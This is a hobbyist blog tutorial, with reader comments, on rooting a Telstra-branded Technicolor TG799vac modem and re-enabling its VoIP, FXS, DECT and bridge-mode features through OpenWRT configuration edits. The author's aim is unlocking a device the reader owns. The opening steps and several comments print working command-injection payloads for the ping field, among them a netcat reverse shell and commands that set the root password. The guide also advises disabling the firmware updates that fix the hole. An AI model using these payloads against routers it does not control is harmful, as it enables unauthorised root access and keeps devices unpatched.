Hacking the Technicolor TG799vac (and unlocking features!)

The TG799vac, known more commonly in Australia as the “Telstra Gateway Max” is a very capable piece of equipment. It has 802.11ac, a VDSL / ADSL2 modem (meaning NBN FTTN compatibility), a DECT base station, 2 x FXS ports for analogue ports, and an FXO port.

They are provided directly to Telstra – and as such, has Telstra branded firmware. There is no ‘generic’ firmware available that will just give you access to the modem as any other device you would purchase. Personally, I think this kind of sucks – as if you decide to use this device with anyone other than Telstra, you lose access to the VoIP functionality, DECT base station, FXO ports. That was the motivation to crack into this device and re-enable as many features as possible.

By default, the IP address of the modem will be 10.0.0.138. In this example, I use a desktop on 10.0.0.122.

First, we have to exploit the web interface to get root access to the device. This can be done by a flaw in IPv6 address validation on the web site – which will allow the web server to run arbitrary code. This is good – otherwise none of the rest would be possible.

Getting root access

On your desktop, we want to open a listening port. Ensure that your firewall will allow this though.
# nc -lvvp 10001

Now visit the ‘Diagnostics’ page on the modem, and click on the Ping & Traceroute tab. In the IP address section, enter:
:::::::;nc 10.0.0.122 10001 -e /bin/sh

If your modem doesn’t display the Diagnostics tile, you can use firebug or something similar (F12 in Internet Explorer) inspect the DOM of the main page of the modem GUI with all the “tiles” on it and change one of the existing “tiles” in the GUI (such as “Management”)

Change..
<div class="settings" id="Management" data-remote="modals/usermgr-modal.lp" data-toggle="modal" data-id="usermgr-modal"></div>

To..
<div class="settings" id="Diagnostics" data-remote="modals/diagnostics-xdsl-modal.lp" data-toggle="modal" data-id="diagnostics-xdsl-modal"></div>

Exit the DOM inspector and click on the “Management” tile as if you were entering the Management page. It should load the Diag page instead.

If all goes well, your modem will now connect to your desktop – and make available a root shell for you. NOTE: At this point, you won’t see any type of shell prompt, or error messages – so while you’ll get output of commands, it can get a little confusing.

First steps – change the root password, get dropbear (the SSH server) to run on boot – NOTE the lack of prompt:

passwd
Changing password for root
New password:
Retype password:
Password for root changed by root
echo 'dropbear &' > /etc/rc.local
reboot

You should now be able to SSH into your modem on on the LAN IP with the username root and password you set above.

$ ssh root@10.0.0.138
root@10.0.0.138's password:
 
BusyBox v1.23.2 (2017-02-08 14:47:26 UTC) built-in shell (ash)
  _______              __           __              __
 |_     _|.-----.----.|  |--.-----.|__|.----.-----.|  |.-----.----.
   |   |  |  -__|  __||     |     ||  ||  __|  _  ||  ||  _  |   _|
   |___|  |_____|____||__|__|__|__||__||____|_____||__||_____|__|
                 N E X T   G E N E R A T I O N   G A T E W A Y
 --------------------------------------------------------------------
 NG GATEWAY SIGNATURE DRINK
 --------------------------------------------------------------------
  * 1 oz Vodka          Pour all ingredients into mixing
  * 1 oz Triple Sec     tin with ice, strain into glass.
  * 1 oz Orange juice
 --------------------------------------------------------------------
 
Product: vant-f_telstra
Release: Aqua (16.3)
Version: 16.3.7567-2521030-20170614084458-887a8c777ed8527277d7137ed9149816c889cf1d
 
 
Hash config:         887a8c777ed8527277d7137ed9149816c889cf1d
Hash openwrt:        ca2463af2522fc727150f23d6e85005112e8e8eb
Hash kernel:         b295f29cce441d87cef07373bfb07b546f720db3
Hash technicolor:    021884ac6200cd08635043046d33a717336a3554
Hash mindspeed:      91b6a7a4d703268d6023c3a58da3d33fc62e7ed8
Hash lte:            cf5c1319d7769c1b9e7721dfebcfe25e8cc1176f
Hash routing:        7b853f235ce96cd14f3abaebf9253c5ca7f72f7d
Hash custo:          85da3def73fee4e92f478d2b1afafdfc16235a81
Hash packages:       0f8aa1264d7a3bf6e4304f0f8ddfdabc4ddac7e4
 
Bootloader: 2.0.54
 
root@mygateway:~#

You’ll note straight away that the firmware is based on OpenWRT. This is always good – as it means that the majority of the OpenWRT configuration is applicable directly to this modem.

Disable software updates

A reader has written to advise that the exploit we have used to get access to the modem is fixed in release 17.1. To prevent your modem from auto-upgrading, I suggest commenting out the following lines in /etc/config/cwmpd as follows:

option upgradesmanaged '0'
#option acs_url 'https://xxxxxxxxxx'

I also recommend disabling the service:

# /etc/init.d/cwmpd stop
# /etc/init.d/cwmpd disable
# /etc/init.d/cwmpdboot disable

Using bridge mode with dedicated PPPoE ethernet port

I use the AP on the device on my LAN – but I also use the modem purely in bridge mode – which means I want to dedicate a port to my router to allow it to do PPPoE to my ISP. Thankfully – standard OpenWRT config applies. I added a new bridge called ‘adsl_wan’ and added eth4, eth3, atm_8_35 and ptm0 to it:

config interface 'adsl_wan'
        option type 'bridge'
        option ip6hint '0'
        option force_link '0'
        list ifname 'eth4'
        list ifname 'eth3'
        list ifname 'atm_8_35'
        list ifname 'ptm0'

You’ll need to remove eth3 from the LAN vlan. This gives you the port right next to the WAN ethernet (which is eth3 – eth4 is the WAN port) on the same bridge as the VDSL/ADSL modem. I have yet to figure out how to get the WAN port to do this – as it seems to be configured differently – maybe at the switch level.

Enable web interface features

If you have the modem in bridge mode, the web interface is gutted compared to in routed mode.

Edit /www/lua/cards_limiter.lua and change the following function to:

function M.card_limited(info, cardname)
  ## Display all cards.
  return false

  if info.bridged then
    return not bridge_limit_list[cardname]
  end
  return false
end

Restart the web interface via: /etc/init.d/nginx restart

Configure a third party SIP provider

Edit /etc/config/mmpbxrvsipnet and use the following guide:

Under the heading sip_net, set:

  • primary_registrar to your SIP server – ie my.sipserver.com
  • primary_registrar_port to 5060
  • primary_proxy to your SIP server – ie my.sipserver.com
  • primary_proxy_port to 5060
  • Under the heading sip_profile_0, set:

  • user_name – your SIP username
  • uri – your SIP username
  • password – your SIP password
  • enabled – set to 1
  • Restart the mmpbxd service via /etc/init.d/mmpbxd restart

    If you have multiple SIP accounts to log into – and with different providers, you can duplicate the entire sip_net section under a different name and configure as per above. Set the profile network setting to point to the new section you have created.

    Enable the FXS ports

    To enable the FXS ports, set the relay_state parameter to ‘1’ in /etc/config/mmpbxbrcmfxsdev – eg for FXS port 2:

    config device 'fxs_dev_0'
            option user_friendly_name 'Phone 1'
            option comfort_noise 'silence'
            option echo_cancellation '1'
            option fax_transport 'inband_renegotiation'
            option t38_redundancy '1'
            option rtcp_interval '5000'
            #list codec_black_list 'G722'
            #list codec_black_list 'AMR-WB'
            option cw_cas_delay '758'
            option fxs_privacy_reason 'P'
            option fxs_unavailability_reason 'O'
            option fxs_port '2'
            option cid_display_date_enabled '1'
            option cid_display_calling_line_enabled '1'
            option cid_display_calling_party_name_enabled '1'
            option pos '0'
            option early_detect_faxmodem '0'
            option relay_state '1'
    

    SIP call routing

    Each DECT device or FXS port can be registered against one or multiple SIP accounts. Look for the incoming_map section against sip_profile_0 and edit as needed. This is my setup to route sip_profile_1 to the first registered DECT device – and FXS port 1:

    config incoming_map
            option profile 'sip_profile_0'
            list device 'fxs_dev_0'
            list device 'dect_dev_1'
            list device 'dect_dev_2'
            list device 'dect_dev_3'
            list device 'dect_dev_4'
            list device 'dect_dev_5'
            list device 'sip_dev_0'
            list device 'sip_dev_1'
            list device 'sip_dev_2'
            list device 'sip_dev_3'
            list device 'sip_dev_4'
            list device 'sip_dev_5'
            list device 'sip_dev_6'
    
    config incoming_map
            option profile 'sip_profile_1'
            list device 'dect_dev_0'
            list device 'fxs_dev_1'
    

    Registering DECT handsets

    After enabling all the ‘cards’ via the web interface, the easy way is to start DECT paring via the web interface. Click on the Telephony card, then ‘Start’ the paring and follow the instructions for your handset. This was straight forward for me.

    Speeding up sync times

    If you are on an NBN FTTN connection, it seems the modem still tries to sync using ADSL first. The default NBN FTTN profile is 17a – so we can disable other modes in /etc/config/xdsl:

    config xdsl 'dsl0'
            #list multimode 'gdmt'
            #list multimode 'adsl2annexm'
            #list multimode 'adsl2plus'
            list multimode 'vdsl2'
            #list profile '8a'
            #list profile '8b'
            #list profile '8c'
            #list profile '8d'
            #list profile '12a'
            #list profile '12b'
            list profile '17a'
            option enabled '1'
            option eoc_vendor_id 'BETMMB'
            option handshake_switch_timeout '0'
            option demod_cap_value '0x90447a'
            option demod_cap_mask '0x90447a'
            option demod_cap2_value '0x790000'
            option demod_cap2_mask '0x790000'
            option aux_features_value '0x1064003'
            option aux_features_mask '0x1064003'
            option vdsl_cfg_flags_value '0x1200e00'
            option vdsl_cfg_flags_mask '0x1200000'
            option xdsl_cfg1_value '0x0'
            option xdsl_cfg1_mask '0x0'
            option xdsl_cfg2_value '0x0'
            option xdsl_cfg2_mask '0x0'
            option maxaggrdatarate '160000'
            option maxdsdatarate '110000'
            option maxusdatarate '40000'
            option eoc_serial_number 'YeahRight 799vac 16.3'
    

    Changing max sync speeds

    In /etc/config/xdsl, you can change the max values for sync speeds. The value maxusdatarate controls the upstream maximum sync speed, maxdsdatarate controls the downstream maximum sync speed, and maxaggrdatarate is the maximum combined speed. The defaults are listed above. This doesn’t change any limitations imposed by line length – or at the DSLAM.

    Update history

    2017-09-02 – Initial revision of this document.
    2017-09-07 – Add section to disable cwmpd to prevent pushed firmware updates locking us out.
    2017-10-20 – Add workaround for diagnostics tile thanks to NetSicK

    33 comments

    Skip to comment form

      • TeddyRaspin on September 4, 2017 at 5:22 pm
      • Reply

      Do you know how disabling this hack and turn back modem to its default status please ?

      1. A standard factory reset should restore everything.

        While the changes survive a reboot, they should not survive the factory reset.

      • TeddyRaspin on September 5, 2017 at 1:54 am
      • Reply

      Anyway on DGA4130 (Technicolor AGTEF) SSH is enabled but using WinSCP or Putty I always get “access denied”. It seems that even if it says “password for root changed by root” and enabled the dropbear (ssh server) via the echo ‘dropbear &’ > /etc/rc.local command, after the reboot process SSH is enabled but it seems to not accepting the root password I’ve inserted before and I don’t know why.

      Maybe my Technicolor modem requires more hacking tweaks. Could you help me please ?

      1. You might need to edit the file /etc/config/dropbear and allow it to use password auth.

        Mine looks like:

        config dropbear
                option enable '1'
                option PasswordAuth 'on'
                option RootPasswordAuth 'on'
                option Port         '22'
                option IdleTimeout '600'
        #       option BannerFile   '/etc/banner'
        
          • Dale on October 5, 2017 at 3:53 pm
          • Reply

          Also works on TG797n v3 (16.1), but instead of:
          echo ‘dropbear &’ > /etc/rc.local

          To enable dropbear I had to edit the file /etc/config/dropbear, thank you.
          To do that I used the sed command to edit line 2, and then lines 3 & 4:
          sed -i '2 s/0/1/' /etc/config/dropbear
          sed -i '3,4 s/off/on/g' /etc/config/dropbear
          cat /etc/config/dropbear

      • Brian on September 7, 2017 at 10:37 pm
      • Reply

      Thanks for this….., Pity they fixed the exploit in the web pages in 17.1 but it seems I got to mine before any push happened.

      Stopped and disabled the update service, but it reappeared after reboot, so i mashed out the update URL with hashes like suggested
      #option acs_url ‘https://################################’

      1. I’m not sure there are any Telstra type modems with 17.1 firmware as yet. Of course, other countries may have a different story…

        • Greg on October 7, 2017 at 10:57 am
        • Reply

        The exploit comes from weaponizedautism.wordpress.com. He said he’d release more unlocking techniques if Technicolor fixes this one. Maybe leave a comment there somehow. I can’t find anywhere to comment.

    1. Can I also add just for the sake of the search engines that most of this also applies to the iinet / internode issued TG–789 VDSL modems?

      Can I also note that on the TG-789 at least that you can enable dropbear ssh by editing the /etc/config/dropbear file instead of adding to the /etc/rc.local file.

      *** dropbear.orig 2017-09-08 09:40:16.532696000 +1000
      — dropbear 2017-09-08 09:41:10.828503662 +1000
      ***************
      *** 1,7 ****
      config dropbear
      ! option enable ‘0’
      ! option PasswordAuth ‘off’
      ! option RootPasswordAuth ‘off’
      option Port ’22’
      # option BannerFile ‘/etc/banner’
      option IdleTimeout ‘600’
      — 1,7 —-
      config dropbear
      ! option enable ‘1’
      ! option PasswordAuth ‘on’
      ! option RootPasswordAuth ‘on’
      option Port ’22’
      # option BannerFile ‘/etc/banner’
      option IdleTimeout ‘600’

      • TeddyRaspin on September 10, 2017 at 7:58 pm
      • Reply

      It would be nice if someone finds out a new exploit on 17.1 to enable root access. I’ve now my modem fixed. 🙁

      • TeddyRaspin on September 15, 2017 at 9:03 pm
      • Reply

      Is there anyone who knows how switch from bank_2 to bank_1 ?

      My modem does not have telnet or ssh access. 🙁

        • MrMatthewM on October 9, 2017 at 12:11 am
        • Reply

        If you do a factory reset it may switch back to bank_1, a failsafe for a failed firmware update.

        I have not exactly confirmed this as 100% but I was watching the console after the update from 15.1 to 16.3 it had upgraded but I had lost access to the web interface (I got Internal server error) this may of been a failed firmware update but watching the console it was booting, so I held down the reset button for 10 seconds and after reboot it booted from bank_1 again and redid the firmware update to 16.3.

      • John Doe on September 25, 2017 at 9:25 pm
      • Reply

      It works also on TG789VAC V2 (16.3).

      /etc/shadow and /etc/config/dropbear changes survives in case of fw upgrade through CWMP or file is overwritten?

      1. I believe they would get over-written.

      • Brian on September 29, 2017 at 10:38 am
      • Reply

      Anyone know if this works on TG800VAC ?

      I can get the executed code to open a shell (Its saying connected), but its immediately dropping back to the Host prompt, not staying connected (i think). Any chance the TG800 is immediately dropping the session ?

        • Darren on September 29, 2017 at 11:13 pm
        • Reply

        I was able to perform the exploit on my TG800 no different from my TG799.

      • notmyname on September 29, 2017 at 4:04 pm
      • Reply

      the netcat connection didnt work for me.
      these steps did work for me:
      1. use this: :::::::;echo 'dropbear &' > /etc/rc.local to enable ssh through traceroute
      2. ssh root@10.0.0.138
      3. (the hard part) had to brute force the password (jks, the password is root)

        • Frank on September 30, 2017 at 1:31 pm
        • Reply

        Excuse my ignorance, but not that savvy with these things. Downloaded netcat and couldn’t get to work. Any chance of expanding on the steps and simplifying in plain simple terms of what you actually did?

        • MrMatthewM on October 2, 2017 at 4:49 pm
        • Reply

        What firmware are you running? still 16.3 or 17.1

        I have been wondering if it would be possible for routers that have been upgraded to 17.1 Is to do a hard reset so the modem switches back to bank 1 then log in via ssh manually switch to bank 2 enable ssh on the 17.1 file system then switch back.

      • Chipsteroo on October 7, 2017 at 12:30 pm
      • Reply

      I had no luck with nc, because on 14.1 the nc command doesn’t support the -e option

      I ended up getting shell access using

      :::::::;dropbear &
      :::::::;echo ‘root:x’ | chpasswd

      Then ssh into router as root with password = x

      • matt on October 7, 2017 at 7:20 pm
      • Reply

      A couple of notes from my recent attempts to do this:

      On a Mac running OS X 10.10 (Yosemite), the command to get netcat to listen is:

      /usr/bin/nc -l 10001

      Also might be worth noting that editing once logged into the modem requires the vi command (and knowing how to use vi) which isn’t explicitly stated in the tutorial above – eg:

      vi /www/lua/cards_limiter.lua

      My modem is still running v15.3 firmware – which greets you at the remote login with warnings about being prerelease and not for deployment. The change to enable all the cards in bridged mode locks you out of the web admin – the password is no longer accepted. sshing back in and commenting out removing that first added “return false” line returns the ability to log in.

      I’m not sure how much info Bridged Mode removed in later firmware, but on 15.3 it appears to be a fairly complete Advanced Settings version (with no simple mode option) – obviously a number of services are disabled, but going back to Routed Mode requires a factory reset, which I assume will wipe all the changes made?

      • Bogemon on October 26, 2017 at 11:12 am
      • Reply

      hello guys

      Just want to check if anyone found anything on doing this on 17.1. Looks like the ping box wont allow me to send it. gives a validation error now. . Any other way to do this?

      • Thisavros on October 29, 2017 at 1:04 pm
      • Reply

      Tks. ssh access worked for me.
      Got the FXS port up with continuous dial tone
      Entered the sip_profile details and maps but when attempting a call it fails after second digit.
      I note in the logs
      Sun Oct 29 11:48:10 2017 user.debug mmpbxd[7155]: [MMUCI] :E: mmUciCommonAllocateContext:248 – Error loading the UCI config from file for mmpbxbrcmsi3217x: UCI_ERR_NOTFOUND
      Sun Oct 29 11:48:10 2017 user.debug mmpbxd[7155]: [MMBRCM] :E: mmBrcmSi3217xConfigLoad:1872 – No Slic configuration is found. Endpoint Driver default config will be used.
      Sun Oct 29 11:48:10 2017 user.debug mmpbxd[7155]: [MMBRCM] :E: mmBrcmInit:590 – mmBrcmSi3217xConfigLoad has failed: MMPBX_ERROR_NOCONFIG

      Have I missed a config file?

        • Thisavros on November 2, 2017 at 11:41 pm
        • Reply

        Hey guys figured it out with some help from the AusiieBB help desk.
        After successfully root kit the router TG800vac Build 16.3.7567-660-RD
        I followed the above guide. Exception being that silly me used the IP address for the proxy & registrar

        After using the “case” sensitive fqdn: eg:
        Proxy Server: AussieBB.nms1.voice.wide.net.au
        Registrar Server: AussieBB.nms1.voice.wide.net.au
        Outbound Proxy: AussieBB.nms1.voice.wide.net.au
        Port: 5060
        VoIP is up and running.

        There are still many errors in the logs but I can make & receive calls.

        Thank you to CRCinAU

      • Sacha Weatherstone on October 30, 2017 at 6:27 pm
      • Reply

      I have the technicolor tg789vac v2 HP running firmware v16.3 (myRyrepublic) I have confirmed that the Ping RCE exploit still works (:::::::`halt` halts the system), The router also has ssh enabled by default but the password is unknown, but the main issue I am having is that I cannot get netcat working, I have confirmed the modem can ping my host but no netcat connection can ever be established, any ideas?

        • Sacha Weatherstone on November 8, 2017 at 7:57 am
        • Reply

        anyone got any ideas?

      • Johnny on November 3, 2017 at 4:00 pm
      • Reply

      Does anyone know how to disable Telstra air. Can’t seem to find any mention of it throughout the router directories.

        • Johnny on November 3, 2017 at 4:22 pm
        • Reply

        /etc/init.d/hotspotd stop

    2. Hi I’m not that strong in router configuration. But I got my ssh running and all is well.

      I want my TG799vac just to be a modem, nothing else, I have a unifi USG gateway that will take care of all routing, firewall etc. but how do you get it in Bridge mode ? I made the adsl_wan as described but it doesn’t seem to take effect, in I missing something here 🙂

      • Will on November 5, 2017 at 10:36 pm
      • Reply

      I have managed to applied the hack.

      I am running the modem in Bridged mode. How can i allow the traffic on the modem connect to internet for the SIP/LAN/etc?

      • Jatz on November 7, 2017 at 1:56 pm
      • Reply

      If you apply this hack and setup a custom voip provider, can you use the Telstra t-voice 502 handset with the non-telstra voip?

      1. From what I understand, this is just a normal DECT phone – so it should work.

      • Jens TC on November 13, 2017 at 12:21 am
      • Reply

      Is it possible to install and use OpenVPN on the Technicolor. Release: Jade (16.2) ?

    Leave a Reply

    Your email address will not be published.